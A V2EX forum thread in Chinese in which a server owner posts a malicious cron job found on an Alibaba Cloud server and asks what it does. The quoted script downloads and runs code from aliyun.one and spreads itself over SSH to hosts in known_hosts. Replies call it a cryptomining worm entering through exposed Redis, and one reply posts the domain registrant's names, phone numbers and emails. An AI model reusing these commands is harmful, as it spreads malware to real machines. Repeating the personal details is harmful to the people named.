阿里云服务器被注入了一个 job,有人知道是什么么

2019-11-29 16:04:33 +08:00
 ppd

crontab -l:

*/15 * * * * (curl -fsSL -m180 aliyun.one||wget -q -T180 -O- aliyun.one)|sh

aliyun.one

export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin mkdir -p /tmp chmod 1777 /tmp echo "/10 * * * * (curl -fsSL -m180 aliyun.one||wget -q -T180 -O- aliyun.one||python -c 'import urllib;print urllib.urlopen("http://aliyun.one").read()')|sh"|crontab - cat > /etc/crontab </dev/null 2>&1 &" & done fi for file in /home/ do if test -d $file; then if [ -f $file/.ssh/known_hosts ] && [ -f $file/.ssh/id_rsa.pub ]; then for h in $(grep -oE "\b([0-9]{1,3}.){3}[0-9]{1,3}\b" $file/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h "(curl -fsSL aliyun.one||wget -q -O- aliyun.one||python -c 'import urllib;print urllib.urlopen("http://aliyun.one").read()')|sh >/dev/null 2>&1 &" & done fi fi done #

大佬们解释一下。

7781 次点击
所在节点    程序员
32 条回复
ppd
2019-11-29 18:57:46 +08:00
@realpg
你猜对了
Tezos
2019-11-29 19:07:24 +08:00
@realpg centos 不背这个锅
file0X0088
2019-11-29 19:08:15 +08:00
电话:+86.17006757575+86.013705182121
注册者:qiu gengmingChong Min She
注册机构:qiu gengmingSheChongMin
邮箱:565336515@qq.comcmshe@qq.com
file0X0088
2019-11-29 19:13:01 +08:00
这个人不太小心啊,信息都暴露了
ppd
2019-11-29 19:45:30 +08:00
@okwork 是的
FS1P7dJz
2019-11-29 19:47:03 +08:00
@file0X0088 并不一定是真实信息
opengps
2019-11-29 20:14:50 +08:00
这个是定向冒充阿里云的挖矿吧
superrichman
2019-11-29 22:35:04 +08:00
这 cron job 想跟病毒一样到处传播。

话说这是第几个 redis 开放公网端口被入侵了的。
anyforever
2019-11-30 19:53:44 +08:00
@opengps +1
4cce1er
2019-12-01 14:17:52 +08:00
通过 redis 种木马有两个条件:
1. 空密码并且允许外部直接连接(bind 0.0.0.0)
2. redis 是 root 权限运行的
vone
2019-12-05 17:29:36 +08:00
大数字是在哪里拦截的
360Netlab Sinkhole Project
这个页面是 360 网络安全研究院安全 DNS 项目的安全提示页面。
常见问题
Q: 这个页面是干什么的?
这个页面是 360 网络安全研究院( 360netlab )用来重定向不安全域名的页面,您访问到这个页面说明您访问的域名(aliyun.one)可能存在不安全行为。
不安全行为的域名类型包括但不限于僵尸网络的主控服务器域名,恶意程序的挖矿域名,钓鱼域名以及其他包含不安全行为的黑灰域名等等。
Q: 我是怎么到这个页面的?
您使用了 360 公司的安全 DNS 服务之后,安全 DNS 会自动对您请求的域名是否安全进行判定,如果域名被判定为不安全就会跳转到这个页面。
Q: 你们错误拦截了合法域名,怎么解封?
360 安全 DNS 仅拦截对用户有不安全行为的域名,在保证用户的上网体验的同时,提高用户上网的安全性。
阻断的域名列表是 360netlab 利用多种技术手段自动化生成的,并不会基于网站具体内容决定是否拦截。
如果您是域名的所有者并确定自己的域名没有不安全行为,请点击此处发送邮件到 sinkhole#360.cn(发邮件之前,请把#替换为 @) ,请在邮件中简要说明域名的功能和用途,并注意确保邮件中标明你要解封的域名
关于 360 网络安全研究院( 360netlab )
欢迎访问我们的网站 360 网络安全研究院( 360netlab )。

感谢您使用 360 安全 DNS 服务。
lifespy
2019-12-06 14:52:39 +08:00
前几天我就发现了。然后我还在隔壁论坛发了个帖子

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/624351

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX